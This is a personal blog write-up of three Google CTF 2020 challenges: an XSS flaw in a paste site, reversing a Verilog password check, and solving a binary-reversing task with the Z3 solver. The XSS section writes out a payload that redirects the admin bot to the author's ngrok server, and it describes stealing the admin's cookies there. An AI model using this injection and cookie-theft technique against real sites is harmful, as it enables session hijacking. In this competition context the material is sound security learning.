How I learned to stop worrying and compete at the Google CTF 2020

If you’re looking for a tenacious and experienced engineer who is just as happy diving deep into hard problems as he is translating technical concepts to a broader audience, I’m available! I have experience in Python, ES6/React, Rails, devops, and more. Please get in touch if you think you have a good opportunity.

This past weekend, I competed in Google’s annual CTF competition along with Angel Irizarry. Capture the Flags are competitions with a variety of computer security challenges. Each challenge has a unique “flag” that is revealed when you successfully exploit a given program. I would rate my security experience as “advanced beginner”—I know common concepts and can do some extremely trivial examples, but more complex vulnerabilities are difficult for me. And for someone at my skill level, you certianly feel the full range of emotions at these events: absolute elation when you finally get the flag to fall out, utter despair after staring at the same 50 lines of code for 2 hours with no idea of what to do, existential crises as you see other teams effortlessly climb the scoreboard, dogged determination as you realize that yes, the challenge is solveable, 127 teams have already done it, so it can’t be that hard after all.

This capture the flag certainly tested my limits. By the end of weekend Angel and I captured 3(!) flags out of a possible 30, placing us 255th out of 700+ teams. No small feat given our level of experience and the small size of our team!

Here are the challenges we solved and our learnings:

Pastuerize

Pastuerize is a website that allows you to create unique links that contain some text. You can then share those pastes with the admin with a single click.

The description for this challenge reads:

This doesn’t look secure. I wouldn’t put even the littlest secret in here. My source tells me that third parties might have implanted it with their little treats already. Can you prove me right?

“My source” hinted that we need to take a look at the source code. The HTML source for the “show paste” page includes the comment “TODO: Fix b/1337 in /source that could lead to XSS”. This comment includes two big hints. The first is that we should look towards XSS. The second is that you can view /source, which is the server source code which includes some additional comments.

While examining the HTML source of the “show note page”, we noticed (heh) the content of the note was being assigned directly to a Javascript variable within a <script> tag. We felt this was the location of the eventual XSS exploit—if we could somehow craft the proper malicious note, we could terminate the string early and execute arbitrary JS code.

Turning now to the server-side source code, Angel and I focused our attention on the custom string sanitation logic. Since they weren’t using a built-in library, we figured that there was some oversight in their escaping logic we would be able to exploit. We thought it was extremely peculiar that they were using JSON.stringify() when the content of the notes was just a plain old string.

After a long while of Googling, test payloads, and increasingy bizarre theories, we decided to look at different parts of the source code again. At the top was the following snippet:

/* They say reCAPTCHA needs those. But does it? */
app.use(bodyParser.urlencoded({
  extended: true
}));

The comment caught our eye and we decided to take a closer look at the documentation for bodyParser. It turns out that passing in the extended option enables you to pass nested data structures into the URL encoded form data. This was the clue we needed. We already knew from our previous inspection of JSON.stringify() within the custom sanitizer that passing in a data structure would allow us to craft the malicious payload we needed, but we couldn’t figure out how to pass in anything other than a string.

In Postman, we carefully crafted a POST request with a x-www-form-encoded payload that looked like content[0]=;window.location.href='<ngrok endpoint>';. Upon loading the show page for the created paste, we were redirected to our ngrok endpoint! We had finally achieved the XSS exploit but we still needed to find the flag. We knew that we could force the admin to visit our endpoint, and that endpoint would force him to visit a page we controlled, but we didn’t know where the flag would be.

We also had to figure out how to get the admin to visit the endpoint in the first place. On the normal “show note” page, there was a button that, when clicked, forced the admin to visit our note. But we couldn’t click it because we redirected immediately to our ngrok URL. So we wrapped XSS exploit in a fetch call which would fire the request in the background, allowing us to click the button. But the admin never visited our page.

By this point, we were gassed. We decided to reconvene in the morning, and that break was just what we needed. Immediately upon waking up, we decided to simplify our logic and return to the manual setting of window.location.href. We then wrapped it in a setTimeout() to give us enough time to click the button before the redirect occurred. For some reason, this worked, and we could see the admin visiting our page! Dumping his cookies on our little toy server yielded the flag. We suspect the fetch method wasn’t working because the admin was using Headless Chrome.

Learnings:

Understand every part of the code.

Hardware Basics

Initially I wasn’t going to look at this one as I know nothing about hardware, but I saw a ton of other teams solving it so I figured I would give it a look.

The gist of the problem is that there is some endpoint that takes a password, and if the password is correct, you receive the flag. You have access to the server code, which is simple: it takes your input, passes it to some hardware module (lol), and if the hardware returns True, you get the flag. You also have acess to a Verilog file, which is simply a software implementation of hardware.

I had never used Verilog in my life and just looking at the code was enough trigger flashbacks to the horror that was EE40. But the file wasn’t too long, so I decided to see if I could figure out what was going on.

The Verilog code is below, I annotated it with my learnings:

module check(
    # the hardware clock
    input clk,

    # The input is 7 bytes
    input [6:0] data,
    output wire open_safe
);

# This sets up 8 7-bit registers called "memory"
reg [6:0] memory [7:0];
reg [2:0] idx = 0;

# Think of this as a 56 bit array. The left-most bit is index 55.
wire [55:0] magic = {
    {memory[0], memory[5]},
    {memory[6], memory[2]},
    {memory[4], memory[3]},
    {memory[7], memory[1]}
};

wire [55:0] kittens = { magic[9:0],  magic[41:22], magic[21:10], magic[55:42] };

# this constant definition means:
# * 56 bits
# * decimal format
assign open_safe = kittens == 56'd3008192072309708;

# This code runs on every clock
always_ff @(posedge clk) begin
    memory[idx] <= data;
    idx <= idx + 5;
end

endmodule

At this point, I felt confidence in my interpretation. Initially, it was super odd that we were working in 7-bit chunks (as bytes are 8 bits), but the number 56 was consistent internally so I felt confident about my interpretation of the code. Angel pointed out that ASCII endpoints are 7 bits, and the password was made up of ASCII chars, and it all clicked. Now that I had a basic idea of what these different variables meant, I could take a look at the actual program structure.

Immediately, it because clear that there were two re-mappings happening:

The memory registers get reshuffled and stuck into magic
magic bits get reshuffled and stuffed into kittens

Since these transforms are clearly defined in the code and we know what the output must be, we can just start with the output, apply each transformation in reverse, and what we wind up with is the password we’re seeking.

We ended up doing this in a Google sheet, with each column representing the binary at each transformation step, and using colors to represent the different slices of the binary array.

Some interesting notes at each step:

3008192072309708 converted to binary is only 52 bits, yet we were working in 56 bits, so we left-padded the binary with 4 zeros
onverting the kittens binary to memory layout was super confusing due to indexing. In most programming languages, index 0 represents the left-most item, but in Verilog, index 0 is the rightmost bit. This complicated the conversion.
We didn’t know exactly what the doubly-nested structure meant, but we went off the assumption that everything in hardware was just a flat row of 56 bits. That turned out to be correct.

At the end of this reversing process, we had 7 bits in each of our 8 memory registers, which we converted to ASCII. And bam, we had a string! We plugged it into the program and…nothing happened.

We double-checked our logic from the reversing process and did find an error in the reversing process, but even with that correction, the resulting password was not the correct solution.

We took a closer look at the loop that actually takes the input and puts into the memory registers. Take a look at the code:

reg [2:0] idx = 0;

...

always_ff @(posedge clk) begin
    memory[idx] <= data;
    idx <= idx + 5;
end

Notice anything interesting? At first, we thought this was a simple for loop where we stick each character in the input into the 0th, 1st, 2nd, etc. registers on each loop iteration. But it’s not quite that simple. We increment idx by 5 each time so on the first iteration we add the first character in the input into memory[0], then on the second iteration we insert into memory[5]. On the third iteration idx should equal 15 but it was instantiated as a 3-bit register, meaning it overflows and you actually insert the third character in the input into memory[3]. As Angel noted, since 5 and 8 are co-prime, every number is guaranteed to be visited before the sequence repeats.

Thus, there are three shuffles that happen:

Shuffle when storing the input into memory due to the overflowing index
Shuffling the memory register orders into the magic buffer
Slicing the magic buffer and inserting the pieces in a jumbled order into kittens

Once we accounted for this additional shuffle, our password was accepted and we captured this flag.

Learnings

Tactile methods, such as pen-and-paper and differently-colored highlighting, are super-valuable when the working memory in your brain is full
To that end, have an engineering notebook handy, one with the little squares. It’s much easier to do these sorts of calculations on paper, and gridded paper at that.
Work backwards. We tried converting the Verilog code to python, but that was only useful for verifying our solution

Reversing Beginner

In this challenge, you are provided with a compiled C program and are expected to reverse it. Angel took the lead on solving this one and this writeup represents my best understanding of his approach.

The first step in these reversing challenges is to open up the compiled program in a disassembler. We started with Ghidra, a high-quality open-source disassembler developed by the NSA. Opening up this program in the disassember and navigating to main.c routine shows a printf("Flag: ") call, some input being manipulated, and then compares the output of those manipulations to the input. Angel intuited there was only one input that would make that happen: the flag.

In Hardware Basics, we had a constant in the source code which we could put through the mainpulations backwards. In this code, however, the comparison at the end of the manipulation was simply between two variables. As Angel explained, what we actually had before us was not a reversing problem, but a satisfiability problem. Once we understood the different operations, we could feed them into a satisfiability solver like Z3 and Z3 would do the hard work of figuring out what input (because there can only be 1, the flag!) satisfies our conditions. Apparently, this is a very common approach for solving these types of reversing problems in CTFs.

Angel set to work understanding the mainpulations being performed on the input so he could encode them as constraints in Z3. This wasn’t as easy as it sounds. Ghidra showed some really gnarly manipulation of the input that we didn’t fully understand. It turns out that it was because the assembly instructions manipulating the input were actually SIMD operations and Ghidra did not know how to properly translate that into C code. The free version of IDA ended up being able to handle the assembly better in our experience, but having access to the original C code ended up not being that useful for this particular challenge.

The two instructutions in question were PSHUFD and ADDD, both of which operate on double words. PSHUFD shuffles the bytes within the doubleword in a specific manner, illustrated here while the ADDD implementation had overflow to contend with.

The each byte of the output of ADDD was also XOR‘d with some constant, which was found by trivially looking at the assembly code in a disassembler like Ghidra.

You can find the assembly code translated into satisfiability constraints here. Running that program spat out the correct flag.

Learnings

Using satisfiability solvers to find valid inputs is extremely common for these types of reversing problems. They aren’t super difficult to understand but it does take some practice to understand how to correctly convert some more complex operations into constraints. Z3 takes awhile to install, so you might consider installing it beforehand.
Spending some time pre-installing and familiarizing yourself with your preferred disassembler is certainly worthwhile as you can almost guarantee there will be a reversing section in CTFs like this.

Again, thanks to the organizers who spent their weekends ensuring the challenges ran smoothly and to Angel Irizarry for sticking with me the whole time. See you next year!